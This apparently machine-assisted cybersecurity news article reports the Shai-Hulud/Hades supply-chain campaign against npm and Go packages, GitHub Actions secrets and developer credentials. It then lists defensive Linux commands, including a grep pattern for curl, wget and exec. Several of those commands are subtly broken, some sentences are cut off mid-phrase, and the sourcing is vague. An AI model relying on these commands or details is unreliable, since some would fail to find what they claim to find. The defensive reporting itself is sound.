Supply Chain Nightmare Returns: Shai-Hulud Malware Expands From npm Packages Into Go Ecosystem With New Developer Credential Theft Campaign, Dark Web recent claims + Video

A New Wave of Developer-Focused Malware Threatens the Software Supply Chain

The software development world is facing another dangerous evolution of a supply chain attack that targets the very tools developers trust every day. Cybersecurity researchers have uncovered a renewed campaign linked to the Mini Shai-Hulud, Miasma, and Hades malware family, showing that attackers are no longer focusing only on traditional vulnerabilities. Instead, they are turning legitimate package ecosystems, automation pipelines, cloud credentials, and developer environments into weapons.

This latest campaign demonstrates a growing reality in modern cybersecurity: developers themselves have become a prime target. A single stolen npm publishing token, GitHub credential, or CI/CD secret can provide attackers with access to thousands of downstream users and organizations.

The campaign has now expanded beyond the npm ecosystem and reached the Go programming environment through a compromised blockchain-related project. Researchers warn that the attackers are continuing to refine their techniques, changing indicators, hiding their activity, and abusing trusted workflows to avoid detection.

The Shai-Hulud Malware Family Continues Its Evolution

Security researchers have identified a new wave of malicious package activity involving compromised npm releases connected to LeoPlatform and RStreams projects. According to researchers, the operation also includes abuse of GitHub Actions workflows and a related compromise involving the Verana Blockchain Go module.

The main objective remains consistent with previous Shai-Hulud campaigns: steal developer credentials, collect sensitive tokens, and use those secrets to spread further through package registries, repositories, and software development pipelines.

Unlike traditional malware campaigns that attack end users directly, this operation focuses on developers who often have elevated access to company infrastructure, cloud environments, and source code repositories.

Compromised npm Packages Reveal a Wider Supply Chain Attack

The attackers distributed malicious versions of multiple npm packages, including:

[email protected]

The campaign also affected:

github.com/verana-labs/[email protected]

The affected packages show that attackers specifically targeted developer tools, cloud integrations, serverless systems, and backend infrastructure components where stolen credentials could provide maximum access.

Stolen npm Credentials Allowed Rapid Malware Deployment

Researchers suspect that an npm developer account associated with LeoPlatform was compromised through leaked credentials. The attacker allegedly used the stolen npm publishing token belonging to the maintainer to upload infected packages.

The malicious releases appeared within an extremely short timeframe, suggesting that attackers were monitoring developer accounts and waiting for an opportunity to inject malicious code quickly before security teams could react.

This method highlights a major weakness in open-source ecosystems: package trust is often inherited from reputation. When a trusted maintainer account becomes compromised, users may unknowingly install malware because the package name and ownership appear legitimate.

Malware Uses Advanced Installation Techniques

One of the most concerning aspects of this campaign is how the malware avoids relying only on traditional npm lifecycle scripts.

Instead, the attackers used a file called binding.gyp to trigger arbitrary code execution during installation. This allowed the malicious package to launch a JavaScript loader that downloads and installs the Bun runtime if necessary.

After preparing the environment, the malware executes its information-stealing payload designed to collect:

Developer credentials

Authentication tokens

Cloud access keys

Repository secrets

Package publishing credentials

CI/CD environment data

This approach allows attackers to bypass some security controls because the malicious behavior is hidden inside a build-related process rather than an obvious installation command.

GitHub Actions Become a New Battlefield

The campaign also abuses GitHub Actions, one of the most widely used automation platforms in modern software development.

The malware creates a workflow named “Run Copilot” designed to capture secrets stored inside CI/CD runners. These environments often contain powerful credentials because they are responsible for automatically building, testing, and deploying applications.

The stolen information is reportedly uploaded to public GitHub repositories acting as temporary storage locations. One repository description identified during the investigation was:

Alright Lets See If This Works.

The attackers also used GitHub as a dead-drop communication system, allowing malware to retrieve commands and additional payloads without relying on traditional command-and-control servers.

The Hades Connection Reveals a Larger Malware Operation

Researchers discovered that the campaign is connected to the Hades malware variant through GitHub polling behavior.

The malware checks GitHub repositories hourly for commits containing the string “firedalazer.” When discovered, the malware retrieves and executes additional malicious components.

This technique demonstrates how attackers are increasingly blending legitimate platforms with malicious operations. Instead of hosting obvious malware infrastructure, threat actors hide communication inside popular services such as GitHub.

Russian Locale Detection and Security Avoidance

The malware includes several defensive mechanisms designed to reduce detection.

Researchers observed:

Russian locale-based execution restrictions

Endpoint security software detection

Encrypted credential theft

GitHub-based command retrieval

Automated propagation attempts

The inclusion of a Russian locale killswitch suggests the attackers may attempt to avoid targeting specific environments or reduce attention from certain security researchers.

The Attack Moves Beyond npm Into Go Projects

The compromise of the Verana Blockchain Go module represents an important change in the campaign.

Previously, the malware focused heavily on npm packages. However, the move into the Go ecosystem demonstrates that attackers are expanding their reach across programming languages.

Unlike npm attacks, the Go compromise does not depend on package installation hooks. Instead, researchers believe the malware can activate through source repository interactions, developer IDE usage, or AI coding assistant environments.

This creates a broader threat because modern developers increasingly interact with code through automated tools that may analyze, clone, or execute project files.

Deep Analysis: Linux Security Commands Developers Should Use Against Supply Chain Malware

Linux Command: Checking Suspicious Package Installations

Developers should regularly inspect installed packages and recently modified files:

npm list --depth=0

This command helps identify unexpected dependencies.

find . -type f -mtime -1

This searches for files modified within the last day.

Linux Command: Searching For Suspicious Scripts

Malicious packages often hide execution commands inside scripts.

grep -R "curl|wget|child_process|exec" .

This searches project files for common malware behaviors.

Linux Command: Monitoring Network Connections

Credential stealers often communicate externally.

netstat -tunap

or:

ss -tunap

These commands reveal active network connections.

Linux Command: Checking Running Processes

ps aux --sort=-%cpu

Unexpected processes consuming resources may indicate compromise.

Linux Command: Auditing Git Changes

git log --stat

Developers should review unusual commits, especially those involving automation workflows.

Linux Command: Checking Environment Secrets

env | sort

This helps identify exposed environment variables.

Linux Command: Searching GitHub Action Files

find .github -type f -name ".yml" -o -name ".yaml"

Automation files should be reviewed regularly.

Linux Command: Detecting Suspicious npm Hooks

cat package.json | grep scripts -A 10

Developers should inspect installation scripts carefully.

Linux Command: File Integrity Monitoring

sha256sum package-lock.json

Unexpected checksum changes may indicate tampering.

Linux Command: Checking Installed Global npm Packages

npm list -g --depth=0

Global packages often have powerful permissions.

Linux Command: Searching Hidden Files

find . -name "."

Attackers frequently hide payloads inside hidden directories.

What Undercode Say:

The latest Shai-Hulud evolution represents a fundamental change in how cybercriminal groups approach software attacks. The biggest danger is not simply the malware payload itself, but the strategy behind it.

Attackers understand that modern software development depends heavily on trust. Developers trust package names, maintainers, automation systems, and open-source communities. This trust creates an opportunity where one compromised account can become a distribution channel.

The campaign also shows that supply chain attacks are becoming increasingly ecosystem-independent. The attackers are not committed to npm alone. They are moving wherever developers work.

The expansion into Go demonstrates that attackers are studying developer habits rather than individual technologies. The target is not a programming language. The target is the workflow surrounding software creation.

The abuse of GitHub Actions is particularly concerning because CI/CD environments often contain some of the most valuable secrets in an organization. A developer laptop compromise is dangerous, but a compromised build pipeline can become a company-wide incident.

The use of Bun as part of the malware execution chain shows how attackers are adapting to modern development trends. New tools designed for performance and productivity can also become attractive components for malicious automation.

The

The traditional security mindset of protecting servers is no longer enough. Organizations must protect developers, repositories, package publishing accounts, and automation workflows.

Strong identity protection is now as important as traditional endpoint security.

Multi-factor authentication for package registries should become standard practice.

Short-lived tokens should replace permanent credentials whenever possible.

Organizations should treat third-party packages as external software dependencies requiring continuous monitoring.

The open-source ecosystem remains one of

The Shai-Hulud campaign proves that cybersecurity is moving toward a new battlefield: the software creation process itself.

✅ The malware campaign targets npm packages and developer ecosystems.
Researchers have identified malicious releases affecting multiple npm packages and developer workflows.

✅ The campaign includes GitHub Actions abuse and credential theft techniques.
The malware attempts to steal CI/CD secrets, repository tokens, and authentication data.

❌ The full identity and motivation of the attackers remain publicly unconfirmed.
Researchers have connected technical indicators but have not publicly confirmed a specific threat actor.

Prediction

(+1) Software supply chain security will receive increased investment as organizations realize developer environments are high-value targets.

(+1) More companies will adopt stronger npm security controls, token restrictions, and automated dependency monitoring.

(+1) AI coding environments will likely introduce stronger sandboxing and security verification features.

(-1) Attackers will continue targeting open-source ecosystems because one compromised package can reach thousands of organizations.

(-1) Smaller open-source maintainers may remain vulnerable due to limited security resources.

(-1) Supply chain attacks will likely become more complex as criminals move across multiple programming ecosystems instead of focusing on one platform.

▶️ Related Video (62% Match):

🕵️‍📝Let’s dive deep and fact‑check.

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

References:

Reported By: thehackernews.com
Extra Source Hub (Possible Sources for article):
https://www.quora.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

Listen to this Post